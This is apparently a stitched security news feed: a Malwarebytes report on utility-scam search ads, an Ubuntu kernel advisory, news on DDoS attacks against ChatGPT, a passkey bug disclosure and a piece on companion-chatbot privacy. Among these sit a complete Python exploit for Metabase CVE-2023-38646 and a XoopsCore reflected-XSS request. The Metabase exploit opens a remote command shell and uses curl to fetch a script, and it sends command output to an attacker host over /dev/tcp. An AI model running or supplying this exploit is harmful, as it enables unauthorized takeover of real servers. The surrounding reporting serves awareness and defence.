Malwarebytes researchers have discovered a prolific campaign of fraudulent energy ads shown to users via Google searches.

For many households, energy costs represent a significant part of their overall budget. And when customers want to discuss their bills or look for ways to save money, scammers are just a phone call away.

Enter the utility scam, where crooks pretend to be your utility company so they can threaten and extort as much money from you as they can.

This scam has been going on for years and usually starts with an unexpected phone call and, in some cases, a visit to your door. Obviously the phone call side of the scam is much more scalable and means the scam can be done from overseas.

However, criminals know that victims are more likely to be tricked if they were the ones who initiated the call. In a recent investigation, we discovered a prolific campaign of fraudulent ads shown to users via Google searches. To give an idea of scale, the number of ads we found exceeds what we have found in previous malvertising cases.

This blog post has two purposes: the first one is to draw awareness to this problem by showing how it works. Secondly, we’ve collected and shared as many ads and fake sites as we could in the hope that action will be taken, with hopefully some cost for the scammers.

**Fraudulent utility scam ads**

The scam begins when a user searches for keywords related to their energy bill. The ads are shown to mobile devices only, which makes sense given how often people use their phones. Also, the ads are geolocated, so that they are relevant to the user’s location.

We found 28 advertisers with over 300 ads, most of them registered by individuals from Pakistan. We have also seen legitimate but hacked advertiser accounts belonging to US entities that were abused. We didn’t investigate further into the whereabouts and identities of the scammers, but we should note that Pakistan is a possible location.

In most cases, tapping on the ad will not open a new website, but instead will prompt you to dial a phone number. This is exactly what the crooks want as many people will have no idea that an ad approved by Google could possibly be fraudulent.

The utility scam often works by threatening and scaring victims into making poor decisions. An unpaid bill, or an offer that is too good to be true and must be accepted immediately are some of their tactics. Once you’ve made that phone call, you’re already in their hands and very close to losing a significant amount of money.

The scammers may even redirect you to their website to “prove” that they are legitimate. Those sites are often credible enough for a victim to feel like they are doing the right thing, but that couldn’t be further from the truth.

**Large scamming infrastructure**

The crooks have registered dozens of different domains names and built templates that appear related to energy or utility savings. The sites are quite simple and consist of one main page with some customer-centric text and one or multiple phone numbers.

We can usually deduce they are fraudulent by looking up their registration date as well as connecting them with search ads.

However, that might not be enough to have them suspended without going through the whole process of calling the scammers, recording the interaction and showing that evidence. This type of investigation requires time and resources to be done properly. Perhaps one of the many scambaiters out there will look into it in the future.

In the meantime, we have tracked and reported as many domains as we could to the relevant registrars in the hope that some may take action and suspend them.

**Keep your identity and money safe from scammers**

This scam is widespread, and so our advice right now is to avoid clicking on any ad from search as the malicious ads largely outnumber the legitimate ones. You can tell it’s an ad as it will be labelled “Sponsored” or “Ad”.

Here are some additional tips:

*   **Watch out for a sense of urgency**. Scammers will often threaten to cut your power immediately. This and similar scare tactics are meant to pressure you into making hasty decisions. Take the time to look things up or speak to a friend before you do anything.
*   **Never disclose personal details** over the phone without being absolutely certain you are talking to the right person. If in doubt, hang up the phone and look for the official phone number from your energy company, perhaps from a past bill. Do not trust any phone number that appears on an online ad.
*   **Beware requests for money transfers or prepaid cards**. These are a huge sign you are dealing with criminals. Again, take your time to think it over even if just for a few hours. Scammers tend to be so impatient they will make all sorts of claims to act right now, which should be a dead giveaway.
*   **Contact your bank immediately** if you think you’ve been scammed and wired money,. Change all your passwords and add a notice with your utility company that someone may attempt to impersonate you.
*   **Report the scam** to the proper authorities, which may be the FTC.

**Malwarebytes protection**

Malwarebytes is working with its partners to go after these scammers. We also provide protection if you are using our iOS app via the ad blocking feature which will disable search ads and other ads that may be targeting you.

**Indicators of Compromise**

**Google advertiser accounts**

**Advertiser name**

**Advertiser ID**

**Number of ads**

Telesoft

N/A

1

Digitron

04170244641179828225

4

Syed muhammad Adnan

08157637715521699841

15

Progressix

02149758434478653441

2

Umair Jameel

11899369518209695745

1

Laiba Mazhar

14248337572488019969

1

Syed Shahmeer Hussain

12265272419404480513

6

Snow Tech

N/A

1

Muhammad Pirzada

12480474916866490369

145

Eco Designs (Private) Limited

17013467067027816449

5

Right Path Solutions

11370048952557633537

21

Rehman Munawar

06906645958470139905

1

ANDREW PAUL GUZMAN

09045338907926855681

17

Economical Deals

09045708721790910465

4

Qasim Ahmed

15768816743289454593

20

Summaira

14596269127925497857

3

Citrex Solutions (Private) Limited

16648988995463675905

19

Get Energy Promo

08074609881656590337

6

Brightboost LLC

07744256527850012673

5

AA DIGITAL LABS (SMC-PRIVATE) LIMITED

10871392529253662721

1

Malik Muhammad Shahroz Ibrahim

N/A

1

HongKong AdTiger Media Co., Limited

14567350391567024129

1

Mah Noor

07681945004880691201

12

Usama Ashfaq

06711852389684477953

2

Ali Raza

04534984293432164353

15

Muhammad Usman Tariq

17723433991509377025

5

SHABNUM FATIMA SHAH

02536959185141104641

4

QASMIC L.L.C-FZ

11321807192694194177

1

**Phone numbers**

888\[-\]960\[-\]3984  
888\[-\]315\[-\]9188  
888\[-\]715\[-\]1808  
888\[-\]873\[-\]0295  
888\[-\]317\[-\]0580  
888\[-\]316\[-\]0466  
888\[-\]983\[-\]0288  
888\[-\]439\[-\]0639  
888\[-\]312\[-\]2983  
844\[-\]967\[-\]9649  
855\[-\]200\[-\]3417  
888\[-\]842\[-\]0793  
888\[-\]207\[-\]3713  
833\[-\]435\[-\]0029  
888\[-\]494\[-\]4956

888\[-\]928\[-\]6404  
888\[-\]374\[-\]1693  
888\[-\]834\[-\]1050  
888\[-\]497\[-\]3560  
888\[-\]960\[-\]2303  
888\[-\]430\[-\]0128  
800\[-\]353\[-\]5613  
888\[-\]407\[-\]1004  
855\[-\]216\[-\]2411  
844\[-\]679\[-\]7635  
888\[-\]483\[-\]2851  
888\[-\]657\[-\]2401  
888\[-\]580\[-\]0106  
888\[-\]326\[-\]7299  
888\[-\]870\[-\]2661

888\[-\]203\[-\]1692  
855\[-\]428\[-\]7345  
888\[-\]641\[-\]0108  
888\[-\]960\[-\]0688  
888\[-\]347\[-\]7462  
888\[-\]448\[-\]0550  
888\[-\]834\[-\]0998  
888\[-\]470\[-\]8496  
888\[-\]554\[-\]0461  
855\[-\]980\[-\]1080  
888\[-\]539\[-\]0722  
866\[-\]685\[-\]0355  
888\[-\]715\[-\]1806  
888\[-\]960\[-\]2550  
888\[-\]641\[-\]0096  
888\[-\]996\[-\]5133

**Scammer domains**

360billingservices\[.\]com  
aadigital\[.\]online  
citrexsolutions\[.\]co  
digitelcare\[.\]com  
eco-designs\[.\]store  
economical-deals\[.\]co  
electricenergybundle\[.\]com  
electricenergyservice\[.\]com  
electricpowerdeal\[.\]com  
energpaybill\[.\]com  

energybilling\[.\]net  
energybillservice\[.\]online  
energycredits\[.\]online  
energyhelpcenter\[.\]com  
energypayment\[.\]shop  
energypoweroffer\[.\]com  
globalenergysolutionz\[.\]com  
homeutilityservices\[.\]com  
makeabillpayment\[.\]com  
paysenergy\[.\]online

powerelectricoffers\[.\]com  
qasmic\[.\]com  
rebornsolutions\[.\]co  
telecombilling\[.\]us  
telecomcredits\[.\]us  
thepowerpayllc\[.\]org  
uenergyproviders\[.\]store  
utilitybillsolution\[.\]site  
utilitybillspayments\[.\]org  
utilitydiscounts\[.\]store  
utilityservices\[.\]us

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 Massive utility scam campaign spreads via online ads 

Ubuntu Security Notice 6635-1 - It was discovered that the USB subsystem in the Linux kernel contained a race condition while handling device descriptors in certain situations, leading to a out-of-bounds read vulnerability. A local attacker could possibly use this to cause a denial of service. Lucas Leong discovered that the netfilter subsystem in the Linux kernel did not properly validate some attributes passed from userspace. A local attacker could use this to cause a denial of service or possibly expose sensitive information.

    =========================================================================Ubuntu Security Notice USN-6635-1February 14, 2024linux-gcp-6.2 vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-gcp-6.2: Linux kernel for Google Cloud Platform (GCP) systemsDetails:It was discovered that the USB subsystem in the Linux kernel contained arace condition while handling device descriptors in certain situations,leading to a out-of-bounds read vulnerability. A local attacker couldpossibly use this to cause a denial of service (system crash).(CVE-2023-37453)Lucas Leong discovered that the netfilter subsystem in the Linux kernel didnot properly validate some attributes passed from userspace. A localattacker could use this to cause a denial of service (system crash) orpossibly expose sensitive information (kernel memory). (CVE-2023-39189)Sunjoo Park discovered that the netfilter subsystem in the Linux kernel didnot properly validate u32 packets content, leading to an out-of-bounds readvulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly expose sensitive information. (CVE-2023-39192)Lucas Leong discovered that the netfilter subsystem in the Linux kernel didnot properly validate SCTP data, leading to an out-of-bounds readvulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly expose sensitive information. (CVE-2023-39193)Kyle Zeng discovered that the IPv4 implementation in the Linux kernel didnot properly handle socket buffers (skb) when performing IP routing incertain circumstances, leading to a null pointer dereference vulnerability.A privileged attacker could use this to cause a denial of service (systemcrash). (CVE-2023-42754)Jason Wang discovered that the virtio ring implementation in the Linuxkernel did not properly handle iov buffers in some situations. A localattacker in a guest VM could use this to cause a denial of service (hostsystem crash). (CVE-2023-5158)Alon Zahavi discovered that the NVMe-oF/TCP subsystem in the Linux kerneldid not properly handle queue initialization failures in certainsituations, leading to a use-after-free vulnerability. A remote attackercould use this to cause a denial of service (system crash) or possiblyexecute arbitrary code. (CVE-2023-5178)Budimir Markovic discovered that the perf subsystem in the Linux kernel didnot properly handle event groups, leading to an out-of-bounds writevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-5717)It was discovered that the CIFS network file system implementation in theLinux kernel did not properly validate the server frame size in certainsituation, leading to an out-of-bounds read vulnerability. An attackercould use this to construct a malicious CIFS image that, when operated on,could cause a denial of service (system crash) or possibly expose sensitiveinformation. (CVE-2023-6606)Xingyuan Mo discovered that the netfilter subsystem in the Linux kernel didnot properly handle inactive elements in its PIPAPO data structure, leadingto a use-after-free vulnerability. A local attacker could use this to causea denial of service (system crash) or possibly execute arbitrary code.(CVE-2023-6817)Budimir Markovic, Lucas De Marchi, and Pengfei Xu discovered that the perfsubsystem in the Linux kernel did not properly validate all event sizeswhen attaching new events, leading to an out-of-bounds write vulnerability.A local attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-6931)It was discovered that the IGMP protocol implementation in the Linux kernelcontained a race condition, leading to a use-after-free vulnerability. Alocal attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-6932)Kevin Rich discovered that the netfilter subsystem in the Linux kernel didnot properly check deactivated elements in certain situations, leading to ause-after-free vulnerability. A local attacker could use this to cause adenial of service (system crash) or possibly execute arbitrary code.(CVE-2024-0193)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  linux-image-6.2.0-1021-gcp      6.2.0-1021.23~22.04.1  linux-image-gcp                 6.2.0.1021.23~22.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-6635-1  CVE-2023-37453, CVE-2023-39189, CVE-2023-39192, CVE-2023-39193,  CVE-2023-42754, CVE-2023-5158, CVE-2023-5178, CVE-2023-5717,  CVE-2023-6606, CVE-2023-6817, CVE-2023-6931, CVE-2023-6932,  CVE-2024-0193Package Information:  https://launchpad.net/ubuntu/+source/linux-gcp-6.2/6.2.0-1021.23~22.04.1

Ubuntu Security Notice USN-6635-1

Metabase version 0.46.6 pre-authentication remote code execution exploit.

    # Exploit Title: metabase 0.46.6 - Pre-Auth Remote Code Execution# Google Dork: N/A# Date: 13-10-2023# Exploit Author: Musyoka Ian# Vendor Homepage: https://www.metabase.com/# Software Link: https://www.metabase.com/# Version: metabase 0.46.6# Tested on: Ubuntu 22.04, metabase 0.46.6# CVE : CVE-2023-38646#!/usr/bin/env python3import socketfrom http.server import HTTPServer, BaseHTTPRequestHandlerfrom typing import Anyimport requestsfrom socketserver import ThreadingMixInimport threadingimport sysimport argparsefrom termcolor import coloredfrom cmd import Cmdimport refrom base64 import b64decodeclass Termial(Cmd):    prompt = "metabase_shell > "    def default(self,args):        shell(args)class Handler(BaseHTTPRequestHandler):    def do_GET(self):        global success        if self.path == "/exploitable":                        self.send_response(200)            self.end_headers()            self.wfile.write(f"#!/bin/bash\n$@ | base64 -w 0  > /dev/tcp/{argument.lhost}/{argument.lport}".encode())            success = True        else:            print(self.path)            #sys.exit(1)    def log_message(self, format: str, *args: Any) -> None:        return Noneclass Server(HTTPServer):    passdef run():    global httpserver    httpserver = Server(("0.0.0.0", argument.sport), Handler)    httpserver.serve_forever()def exploit():    global success, setup_token    print(colored("[*] Retriving setup token", "green"))    setuptoken_request = requests.get(f"{argument.url}/api/session/properties")    setup_token = re.search('"setup-token":"(.*?)"', setuptoken_request.text, re.DOTALL).group(1)    print(colored(f"[+] Setup token: {setup_token}", "green"))    print(colored("[*] Tesing if metabase is vulnerable", "green"))    payload = {        "token": setup_token,        "details":        {            "is_on_demand": False,            "is_full_sync": False,            "is_sample": False,            "cache_ttl": None,            "refingerprint": False,            "auto_run_queries": True,            "schedules":            {},            "details":            {                "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('http://{argument.lhost}:{argument.sport}/exploitable').openConnection().getContentLength()\n$$--=x\\;",                "advanced-options": False,                "ssl": True                },                "name": "an-sec-research-musyoka",                "engine": "h2"                }                }    timer = 0    print(colored(f"[+] Starting http server on port {argument.sport}", "blue"))    thread = threading.Thread(target=run, )    thread.start()    while timer != 120:        test = requests.post(f"{argument.url}/api/setup/validate", json=payload)        if success == True :            print(colored("[+] Metabase version seems exploitable", "green"))            break        elif timer == 120:            print(colored("[-] Service does not seem exploitable exiting ......", "red"))            sys.exit(1)    print(colored("[+] Exploiting the server", "red"))        terminal = Termial()    terminal.cmdloop()def shell(command):    global setup_token, payload2    payload2 = {        "token": setup_token,        "details":        {            "is_on_demand": False,            "is_full_sync": False,            "is_sample": False,            "cache_ttl": None,            "refingerprint": False,            "auto_run_queries": True,            "schedules":            {},            "details":            {                "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl {argument.lhost}:{argument.sport}/exploitable -o /dev/shm/exec.sh')\n$$--=x",                "advanced-options": False,                "ssl": True                },                "name": "an-sec-research-team",                "engine": "h2"                }                }        output = requests.post(f"{argument.url}/api/setup/validate", json=payload2)    bind_thread = threading.Thread(target=bind_function, )    bind_thread.start()    #updating the payload    payload2["details"]["details"]["db"] = f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash /dev/shm/exec.sh {command}')\n$$--=x"    requests.post(f"{argument.url}/api/setup/validate", json=payload2)    #print(output.text)def bind_function():    try:        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        sock.bind(("0.0.0.0", argument.lport))        sock.listen()        conn, addr = sock.accept()        data = conn.recv(10240).decode("ascii")        print(f"\n{(b64decode(data)).decode()}")    except Exception as ex:        print(colored(f"[-] Error: {ex}", "red"))        pass    if __name__ == "__main__":    print(colored("[*] Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]", "magenta"))    args = argparse.ArgumentParser(description="Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]")    args.add_argument("-l", "--lhost", metavar="", help="Attacker's bind IP Address", type=str, required=True)    args.add_argument("-p", "--lport", metavar="", help="Attacker's bind port", type=int, required=True)    args.add_argument("-P", "--sport", metavar="", help="HTTP Server bind port", type=int, required=True)    args.add_argument("-u", "--url", metavar="", help="Metabase web application URL", type=str, required=True)    argument  = args.parse_args()    if argument.url.endswith("/"):        argument.url = argument.url[:-1]    success = False    exploit()

Metabase 0.46.6 Remote Code Execution

By Waqas
Is your ChatGPT down? Or, are you experiencing issues accessing ChatGPT? If so, you’re not alone. ChatGPT has…
This is a post from HackRead.com Read the original post: ChatGPT Down? Anonymous Sudan Claims Responsibility for DDoS Attacks

Is your ChatGPT down? Or, are you experiencing issues accessing ChatGPT? If so, you’re not alone. ChatGPT has been encountering service disruptions and numerous errors lately. The cause appears to be DDoS attacks, possibly instigated by Anonymous Sudan.

Anonymous Sudan, a now prominent group of hacktivists, has claimed responsibility for targeting ChatGPT and its parent company, OpenAI, with a series of DDoS attacks.

Anonymous Sudan also referenced alleged tweets attributed to Tal Broda, Head of Research Platform at OpenAI. The screenshots of these tweets depict Tal denying the existence of Palestine and criticizing calls for a ceasefire in Gaza.

According to Anonymous Sudan, they plan to continue their DDoS attacks until OpenAI implements behavioural changes to ChatGPT to prevent the propagation of what they deem as “dehumanizing views of Palestinians.” Additionally, they demand the removal of Tal Broda from his position at OpenAI.

Anonymous Sudan on Telegram (Screenshots: Hackread.com)

On the contrary, ChatGPT’s Status Page confirms service disruptions, including login issues. It also notes an “Elevated error rate impacting ChatGPT,” indicating a higher-than-usual number of errors occurring within the system or process. Such errors could arise from various factors, including faulty hardware, software bugs, network issues, DDoS attacks, or even human error.

Nevertheless, OpenAI is actively monitoring the situation and working to resolve the issue. However, as of now, there has been no official confirmation or acknowledgement from OpenAI regarding the company experiencing cyber attacks or the specific reasons behind the ChatGPT errors that users have been reporting since this afternoon.

****Anonymous Sudan vs ChatGPT and OpenAI****

This isn’t the first instance where Anonymous Sudan has claimed responsibility for DDoSing ChatGPT. Last November, the group made similar claims, and OpenAI acknowledged that its infrastructure was indeed targeted by DDoS attacks.

For expert commentary, we reached out to Oded Vanunu, Head of Product Vulnerability Research at Check Point Software. Vanunu linked Anonymous Sudan’s DDoS attacks to a strategy aimed at garnering media attention.

“Russian-affiliated groups Anonymous Sudan and SkyNet have claimed responsibility for the latest outages on the OpenAI website and ChatGPT service. This is according to an ‘official spokesperson’ for Anonymous Sudan going by the name of Crush on Telegram,” said Oded.

“Hacktivists often look for high-profile targets to disrupt in order to bring attention to themselves and in this case, Crush claims the groups attacked OpenAI due to the company’s perceived support of Israel.”

****Anonymous Sudan’s Recent Activities****

Anonymous Sudan has been notably active in recent times. According to a recent report by Hackread.com, the group has conducted DDoS attacks on various targets, including the Israeli BAZAN Group and the United Arab Emirates-based FlyDubai Airline.

Furthermore, the group targeted Thuraya Mobile Satellite Communications Company, an international mobile-satellite service (MSS) provider headquartered in Dubai, United Arab Emirates (UAE). In both attacks on UAE-based infrastructure, Anonymous Sudan claimed that the UAE’s support for the Rapid Support Forces (RSF) was evident through communication channels.

It’s worth noting that the RSF is a paramilitary force previously operated by the Government of Sudan and has been accused by hacktivists of committing war crimes against the Sudanese people.

1.  **Hackers Target Israeli Rocket Alert App Users with Spyware**
2.  **10 Top DDoS Attack Protection and Mitigation Companies in 2023**
3.  **Google, Cloudflare and AWS Disclose Largest DDoS Attack in History**
4.  **Hackers Send Fake Rocket Alerts to Israelis via Hacked Red Alert App**
5.  **Researchers Leverage ChatGPT to Expose Notorious macOS Malware**
6.  **WormGPT – Malicious ChatGPT Alternative Empowering Cybercriminals**

ChatGPT Down? Anonymous Sudan Claims Responsibility for DDoS Attacks

The Google Passkey Manager on Android appears to have inconsistent messaging for deletion of data along with other varying issues that lead us to believe it's not ready for prime time.

*INTRODUCTION*  
Passkeys on Android are stored in Google Password Manager by default. The user cannot make their own backups of them.

Note: although the user can export a CSV file with both passkeys and passwords, the lines representing passkeys will not contain any secrets, rendering them useless.

Also note that Google Passkey Manager appears to primarily be a CLOUD-based password manager (with copies of passwords and passkeys usually cached on devices).

*PROBLEM*  
The user may have chosen to configure a "sync passphrase" in Chrome.  
Instructions on what to do, in case the user wishes to change or remove their sync passphrase, can be found in [1] under "Reset your passphrase".

Effectively the user is sent to [2] and should press the button "Clear Data" at the bottom of that page.  
Until mid June 2023, the text near that button used to read (emphasis in CAPS added by me):

   "This will clear your Chrome data from your Google Account.  
   THIS WON'T CLEAR ANY DATA FROM YOUR DEVICES."

However, tapping the "Clear Data" button would unrecoverably DELETE ALL YOUR PASSKEYS (not your passwords).

*ISSUE REPORTED TO GOOGLE*  
I reported this "passkeys gone" problem to Google as a security issue on June 11, 2023.  
Please see the Timeline below for details.

*"FIX"*  
The issue was "fixed" around June 15, 2023, apparently by changing the text at the bottom of [2] into (emphasis in CAPS added by me):

   "This will clear your Chrome data that has been saved in your Google Account.  
   THIS MIGHT CLEAR SOME DATA FROM YOUR DEVICES."

However, tapping the "Clear Data" button will still DELETE ALL OF YOUR PASSKEYS without any other warnings.

In my opinion this is unacceptable, as is the handling of my bug report. Therefore I have not yet reported the issues mentioned below to Google nor to the Chromium team.

*POTENTIAL SYNC ISSUES*  
Apparently Google decided to use a DEVICE based encryption key (instead of a Google ACCOUNT based key) to encrypt the passkey's private keys.  
The idea is that, if you start using an second Android device, the encryption key from the first device is transferred  to your second device.

Note that this requires you to enter your Google cloud password PLUS the screen unlock code of your first device on your second device.

However, transfer of the encryption key will fail if the second device ALREADY HAS an encryption key.

Note: I actually ran into this condition accidentally during tests.  
Although this may not be a typical situation, it is possible to reproduce (which I will not (yet) describe).

Consequently, if you you brick or loose your old Android device, and somehow you managed to already have a DIFFERENT encryption key on your new Android device, passkeys and passwords will sync from the cloud, but the synced passkeys will be UNUSABLE on your new device.

Tip: whatever you do on a new replacement device: don't start by creating a passkey as a test!  
Wait until your old passkeys have synchronized to your new device and you've confirmed that they work, before you add any new passkeys.

*BUG IN PASSWORDS.GOOGLE.COM*  
Editing a passkey's (user) name in [3] renders all passkeys for the domain unusable, with the following error message when attempting to use them:

   "No Passkeys Available  
   There aren't any passkeys for [domain] on this device"

That particular passkey will be unusable forever.  
However, any other passkeys for the same domain become usable again after you delete the -now corrupt and unusable- passkey.

*OTHER ISSUES*  
During my tests I found a lot of other issues (mostly minor compared to those mentioned above).  
Such as the following worrisome messages I repeatedly saw:

   "An unknown error occurred while talking to the credential manager."

   "For security, you can no longer access your encrypted data on this device."

Also, in Chrome settings, after enabling sync, tapping on "Password Manager" would usually open Google Password Manager (implemented as a part of Google Play Services), but sometimes the Chrome built-in password manager instead.

I may reveal other issues at a later stage.

*CONCLUSION*  
In my opinion the reliability of Android's passkey implementation insufficient (immature, not production ready).

There is no way for the user to back up their passkey secrets themselves, while cloud storage of passkeys can obviously not be relied upon (Google owns your passkeys, not you).

The partial integration of Google Password Manager with Chrome's builtin password manager complicates things - in particular when combined with a "sync passphrase" and/or "on device encryption".  
The apparent confusion which party (Google or the Chromium team) is responsible for fixing bugs in Google Password Manager seems amateuristic annd chaotic.

Account lockout is a serious risk. If fallbacks to passwords or recovery codes remains a necessity because of easily lost passkeys, the advantage of "phishing resistance" is mostly moot.

*DISCLOSURE TIMELINE* (format: yyyy-mm-dd)  
2023-06-06 I published a Dutch article "Passkeys voor leken" (Passkeys for beginners) [4].

2023-06-08 After enabling encryption (using a sync passphrase) for all synced data, and then following Google's instructions [1] on how to change that passphrase, I noticed that all passkeys on my Google Pixel 6 Pro Android phone had disappeared.

I wrote about this in [5], but initially thought that I made a mistake myself.  
After thid incident I started to further investigate this issue, which appeared to reproduce.

2023-06-11 I uploaded a vulnerability report to Google titled "Passkeys gone from device after clearing Chrome data from Google Account" [6].

2023-06-12 Google acknowledges receiving my report.

2023-06-14 Google forwards my report to the Chromium team [7] and sets the status of the Google issue to "Won't Fix (Infeasible)".

2023-06-14 Im am notified that my vulnerability report was registered by the Chromium team.  
In [7] I see that the issue was assigned to a specific person (the "assignee" from now on).

2023-06-15 On the bug tracking website [7] I uploaded a zip-file with screenshots to further clarify things.

2023-06-15 The assignee wrote in [7]:

   "This is as expected, but you're right that we should clarify that on the page and that it's unexpected that Android's implementation of Sync differs r.e. the clearing of data from devices."

2023-06-15 The assignee adds a comment:

   "> it's unexpected that Android's implementation of Sync differs r.e. the clearing of data from devices.  
   (Sorry, that was poorly worded. It's potentially _surprising_ that Android differs given the wording.)"

At that time I did not understand what the assignee meant. Later I discovered by accident that the text at the bottom of [2] had been changed, and the assignee was apparently referring to that text.

2023-08-10 After 60 days since my initial report, I addded a comment in [7] that I am able to reproduce the vulnerability using the latest (August) Android update. I added:

   "I don't know whether this is a Chromium or an Android issue, but losing passkeys is unacceptible.  
   What gives?"

2023-09-10 (after 90 days) On [6] I reported that I had not heard back from the Chromium team since June 15 and that I do not understand what they wrote that day, and that there was no response to my August 8 comment.

2023-09-11 My latest comment in [6] is acknowledged by Google and under review.

2023-09-15 Google states that they won't do anything as this vulnerability is tracked by [7].

2024-02-07 No updates on [6] and [7].  
Publication.

*REFERENCES*  
[1] https://support.google.com/chrome/answer/165139

[2] https://chrome.google.com/sync

[3] https://passwords.google.com/

[4] https://security.nl/posting/798699/Passkeys+voor+leken

[5] https://security.nl/posting/798932

[6] https://issuetracker.google.com/issues/286730198

[7] https://bugs.chromium.org/p/chromium/issues/detail?id=1454857

Google Android Passkey Deletion / Confusion

Romantic chatbots collect huge amounts of data, provide vague information about how they use it, use weak password protections, and aren’t transparent, new research from Mozilla says.

You shouldn’t trust any answers a chatbot sends you. And you probably shouldn’t trust it with your personal information either. That’s especially true for “AI girlfriends” or “AI boyfriends,” according to new research.

An analysis into 11 so-called romance and companion chatbots, published on Wednesday by the Mozilla Foundation, has found a litany of security and privacy concerns with the bots. Collectively, the apps, which have been downloaded more than 100 million times on Android devices, gather huge amounts of people’s data; use trackers that send information to Google, Facebook, and companies in Russia and China; allow users to use weak passwords; and lack transparency about their ownership and the AI models that power them.

Since OpenAI unleashed ChatGPT on the world in November 2022, developers have raced to deploy large language models and create chatbots that people can interact with and pay to subscribe to. The Mozilla research provides a glimpse into how this gold rush may have neglected people’s privacy, and into tensions between emerging technologies and how they gather and use data. It also indicates how people’s chat messages could be abused by hackers.

Many “AI girlfriend” or romantic chatbot services look similar. They often feature AI-generated images of women which can be sexualized or sit alongside provocative messages. Mozilla’s researchers looked at a variety of chatbots including large and small apps, some of which purport to be “girlfriends.” Others offer people support through friendship or intimacy, or allow role-playing and other fantasies.

“These apps are designed to collect a ton of personal information,” says Jen Caltrider, the project lead for Mozilla’s Privacy Not Included team, which conducted the analysis. “They push you toward role-playing, a lot of sex, a lot of intimacy, a lot of sharing.” For instance, screenshots from the EVA AI chatbot show text saying “I love it when you send me your photos and voice,” and asking whether someone is “ready to share all your secrets and desires.”

Caltrider says there are multiple issues with these apps and websites. Many of the apps may not be clear about what data they are sharing with third parties, where they are based, or who creates them, Caltrider says, adding that some allow people to create weak passwords, while others provide little information about the AI they use. The apps analyzed all had different use cases and weaknesses.

Take Romantic AI, a service that allows you to “create your own AI girlfriend.” Promotional images on its homepage depict a chatbot sending a message saying,“Just bought new lingerie. Wanna see it?” The app’s privacy documents, according to the Mozilla analysis, say it won’t sell people’s data. However, when the researchers tested the app, they found it “sent out 24,354 ad trackers within one minute of use.” Romantic AI, like most of the companies highlighted in Mozilla’s research, did not respond to WIRED’s request for comment. Other apps monitored had hundreds of trackers.

In general, Caltrider says, the apps are not clear about what data they may share or sell, or exactly how they use some of that information. “The legal documentation was vague, hard to understand, not very specific—kind of boilerplate stuff,” Caltrider says, adding that this may reduce the trust people should have in the companies.

‘AI Girlfriends’ Are a Privacy Nightmare

XoopsCore25 version 2.5.11 suffers from a cross site scripting vulnerability.

    ## Title: XoopsCore25-2.5.11-XSS-Reflected## Author: nu11secur1ty## Date: 02/12/2024## Vendor: https://xoops.org/## Software: https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.11## Reference: https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected## Description:The value of the yname request parameter is copied into the value ofan HTML tag attribute which is encapsulated in single quotation marks.The payload '>333< was submitted in the yname parameter. This inputwas echoed unmodified in the application's response. The attacker cantrick the user to visit very dangerous and malicious URL in thissessionSTATUS: HIGH Vulnerability[+]Exploit execution:```POSTPOST /XoopsCore25-2.5.11/htdocs/misc.php HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflate, brAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160Safari/537.36Connection: closeCache-Control: max-age=0Cookie: xoops_session_65ca21e5=1mc2a5bq1c0m2kh9j1qn5ilqmnOrigin: https://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: https://pwnedhost.com/XoopsCore25-2.5.11/htdocs/misc.php?action=showpopups&type=friend&op=sendform&t=1707748563Content-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 148yname=VHBoIy'%3e%3ccXWog%3c&ymail=VHBoIy&fname=VHBoIyxV&fmail=VHBoIy&submit=Send&XOOPS_TOKEN_REQUEST=8a6867d76a2aace97646eefb42934056&action=showpopups&type=friend```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/xoops.org/XoopsCore25-2.5.11)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/02/xoopscore25-2511-xss-reflected.html)## Time spent:01:17:00

XoopsCore25 2.5.11 Cross Site Scripting

